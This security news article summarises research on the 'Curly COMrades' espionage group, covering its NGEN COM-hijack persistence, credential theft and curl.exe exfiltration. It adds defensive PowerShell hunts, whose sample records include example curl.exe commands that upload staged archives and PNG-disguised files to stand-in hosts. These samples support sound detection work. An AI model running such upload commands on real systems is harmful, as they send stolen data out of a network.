Bitdefender Labs has uncovered a new cyber-espionage group, dubbed “Curly COMrades”, believed to operate in support of Russian geopolitical interests. Active since mid-2024, the group has been conducting targeted intrusions against judicial and government bodies in Georgia, as well as an energy distribution company in Moldova.
According to the researchers, “The group’s primary objective is to maintain long-term access to target networks and steal valid credentials.” Those credentials, harvested through repeated attempts to extract the NTDS database and dump LSASS memory on compromised systems, are then used for lateral movement, data collection, and exfiltration.
At the core of Curly COMrades’ toolkit is a newly discovered backdoor named MucorAgent, which relies on a novel persistence method: hijacking the CLSID referenced by the NGEN (Native Image Generator) scheduled tasks, so that when the task fires it loads the attacker’s COM server instead of the legitimate .NET handler.
Bitdefender explains that NGEN tasks are usually disabled, but “the operating system occasionally enables and executes [them] at unpredictable intervals… making it a great mechanism for restoring access covertly.” The malware’s three-stage architecture lets it execute AES-encrypted PowerShell scripts without spawning a powershell.exe process, and it exfiltrates the results disguised as PNG image files via curl.exe. Note for defenders: hosting the PowerShell engine inside another process defeats detections keyed on the powershell.exe image name, but it does not bypass PowerShell Script Block Logging (event ID 4104 in Microsoft-Windows-PowerShell/Operational), which is emitted by the engine itself regardless of the host process.
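The report does not publish the hijacked CLSID, so the following hunt, added here as an example and not part of Bitdefender’s report or tooling, hard-codes nothing: it enumerates every task under the standard NGEN task folder, extracts the CLSID from each ComHandler action, resolves it the way COM activation would (HKCU first, then HKLM, then the 32-bit view), and flags resolutions that point outside %windir%, to a missing DLL, or to a per-user override. The task folder path and the “DLL must live under %windir%” heuristic are assumptions that may need tuning on hosts with relocated .NET installations.

```powershell
# Added example (not from the Bitdefender report): hunt for COM-handler hijacks
# of the .NET NGEN scheduled tasks. Run elevated on the host under review.
# Assumptions: NGEN tasks live under the standard folder below, and a legitimate
# handler DLL resolves to a path under %windir%.

$taskFolder = '\Microsoft\Windows\.NET Framework\'   # standard NGEN task folder

function Resolve-ComServer {
    param([Parameter(Mandatory)][string]$Clsid)
    # Order mirrors COM activation for a user-context process: HKCU shadows HKLM.
    $keys = @(
        "HKCU:\Software\Classes\CLSID\$Clsid\InprocServer32",
        "HKLM:\Software\Classes\CLSID\$Clsid\InprocServer32",
        "HKLM:\Software\Classes\Wow6432Node\CLSID\$Clsid\InprocServer32"
    )
    foreach ($k in $keys) {
        if (Test-Path -Path $k) {
            $dll = (Get-ItemProperty -Path $k).'(default)'
            [pscustomobject]@{
                Hive   = $k.Split(':')[0]
                Key    = $k
                Server = if ($dll) { $dll.Trim('"') } else { '' }
            }
        }
    }
}

$findings = foreach ($task in Get-ScheduledTask -TaskPath $taskFolder -ErrorAction SilentlyContinue) {
    # Export-ScheduledTask returns the task definition as XML text.
    $xml = [xml](Export-ScheduledTask -TaskName $task.TaskName -TaskPath $task.TaskPath)
    foreach ($action in @($xml.Task.Actions.ComHandler)) {
        if (-not $action) { continue }
        $clsid = $action.ClassId
        foreach ($s in @(Resolve-ComServer -Clsid $clsid)) {
            $expanded = [Environment]::ExpandEnvironmentVariables($s.Server)
            $reasons  = @()
            if ($s.Hive -eq 'HKCU') { $reasons += 'per-user CLSID override present (HKCU shadows HKLM)' }
            if ($expanded -and $expanded -notlike "$env:windir\*") { $reasons += 'handler DLL resolves outside %windir%' }
            if ($expanded -and -not (Test-Path -Path $expanded)) { $reasons += 'handler DLL path does not exist on disk' }
            if (-not $expanded) { $reasons += 'InprocServer32 key exists but has no default value' }
            if ($reasons) {
                [pscustomobject]@{
                    Task   = "$($task.TaskPath)$($task.TaskName)"
                    State  = $task.State
                    CLSID  = $clsid
                    Key    = $s.Key
                    Server = $s.Server
                    Why    = $reasons -join '; '
                }
            }
        }
    }
}

if ($findings) { $findings | Format-List } else { "No anomalous CLSID resolution for tasks under $taskFolder" }
```

A task reported as Disabled is still worth reviewing here: the whole point of the technique is that the OS enables and runs these tasks on its own schedule, so the state at hunt time says nothing about whether the hijacked handler has already executed.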
The group maintains multiple redundant access paths using Resocks and other SOCKS5 proxies, SSH tunnels, and Stunnel, often deploying open-source proxy tools from GitHub as Go binaries obfuscated with garble. These tools are named and placed to blend in with legitimate system processes and are kept resident through scheduled tasks and Windows services.
In one case, Curly COMrades used a compromised Redmine server in Ukraine as a relay point, likely to evade geographic restrictions and blend malicious traffic with normal business operations. “By routing C2 and data exfiltration through seemingly harmless sites, they bypass defenses that trust known domains and hide their true infrastructure,” the report notes.
Credential harvesting remains a key focus, with the group employing tools like Mimikatz, TrickDump, and custom LSASS dumpers, some of which use the same AES key patterns as MucorAgent. Techniques include DCSync attacks, NTDS extraction via Volume Shadow Copy, and theft of browser-stored credentials from Chrome and Firefox.
Their approach is persistent rather than surgical: “Sometimes, their approach appeared to rely on attempting multiple techniques until successful access was achieved.”
Exfiltration is deliberately rare and often manual, minimizing detection risk. Data, including credentials, domain controller scripts, and internal application archives, is staged in C:\Users\Public\Documents before being archived with WinRAR and uploaded to attacker-controlled or compromised servers using curl.exe.
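The staging-and-upload chain above (WinRAR archive in C:\Users\Public\Documents, then curl.exe upload) and the PNG-disguised curl.exe exfiltration attributed to MucorAgent earlier are visible in process-creation telemetry. The hunt below is an added example, not code from the report: it scores each process-creation record on co-occurring indicators so that a lone legitimate curl.exe download does not fire. The records are constructed for illustration; in production, project Sysmon Event ID 1 (or Security 4688 with command-line auditing enabled) into the same Image/CommandLine/User shape and pipe them through Get-ExfilSuspects. The IP, hostnames and file names in the samples are invented.

```powershell
# Added example (not from the Bitdefender report): score process-creation
# records for the staging + curl.exe upload pattern. Sample records are
# CONSTRUCTED for illustration and are not real telemetry.

$stagingDir = 'C:\Users\Public\Documents'   # staging path named in the report
$threshold  = 2                             # indicators required before a record is reported

$events = @(
    [pscustomobject]@{ Time='2025-01-01T09:00:00'; User='CORP\jdoe'
        Image='C:\Windows\System32\curl.exe'
        CommandLine='curl.exe -L -o C:\Users\jdoe\Downloads\setup.exe https://updates.example.com/setup.exe' }
    [pscustomobject]@{ Time='2025-01-01T09:05:00'; User='CORP\svc01'
        Image='C:\Program Files\WinRAR\WinRAR.exe'
        CommandLine='"C:\Program Files\WinRAR\WinRAR.exe" a -hp -m5 C:\Users\Public\Documents\out.rar C:\Users\Public\Documents\ntds C:\Users\Public\Documents\scripts' }
    [pscustomobject]@{ Time='2025-01-01T09:07:00'; User='CORP\svc01'
        Image='C:\Windows\System32\curl.exe'
        CommandLine='curl.exe -s -T C:\Users\Public\Documents\out.rar https://203.0.113.10/upload/' }
    [pscustomobject]@{ Time='2025-01-01T10:00:00'; User='CORP\svc01'
        Image='C:\Windows\System32\curl.exe'
        CommandLine='curl.exe -s --data-binary @C:\Users\Public\Documents\img.png -H "Content-Type: image/png" https://relay.example.net/up.php' }
)

function Get-ExfilSuspects {
    param([Parameter(Mandatory, ValueFromPipeline)] $Event)
    process {
        $cl      = [string]$Event.CommandLine
        $img     = ($Event.Image -split '[\\/]')[-1]
        $reasons = @()

        if ($img -ieq 'curl.exe') {
            # Switches that send a request body or file; plain downloads (-o, -L, -O) do not match.
            $upload = $cl -match '(^|\s)(-T|--upload-file|-F|--form|-d|--data(-binary|-raw|-urlencode)?)(\s|$)'
            $hasUrl = $cl -match 'https?://'
            if ($upload -and $hasUrl) { $reasons += 'curl.exe uploads data to a URL' }
            if ($upload -and $cl -match '\.png\b|image/png') { $reasons += 'upload body named or typed as PNG' }
        }
        if ($img -match '^(WinRAR|Rar)\.exe$' -and $cl -match '(^|\s)a(\s|$)') {
            $reasons += 'archive created with WinRAR'
        }
        if ($cl -like "*$stagingDir*") { $reasons += "command line references $stagingDir" }

        if ($reasons.Count -ge $threshold) {
            [pscustomobject]@{
                Time        = $Event.Time
                User        = $Event.User
                Image       = $img
                Score       = $reasons.Count
                Why         = $reasons -join '; '
                CommandLine = $cl
            }
        }
    }
}

# Expected on the constructed sample: the download is not reported; the other three are.
$events | Get-ExfilSuspects | Sort-Object Time | Format-List
```

The scoring keeps the rule quiet on hosts where administrators legitimately use curl.exe, while the staging directory alone is enough to lift an archive or upload over the threshold; widen `$stagingDir` to a list if the actor rotates staging paths in your environment.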
Bitdefenderβs findings serve as a reminder that well-resourced threat actors can combine ordinary utilities with creative persistence to evade security measures for extended periodsβa threat that critical infrastructure operators must take seriously.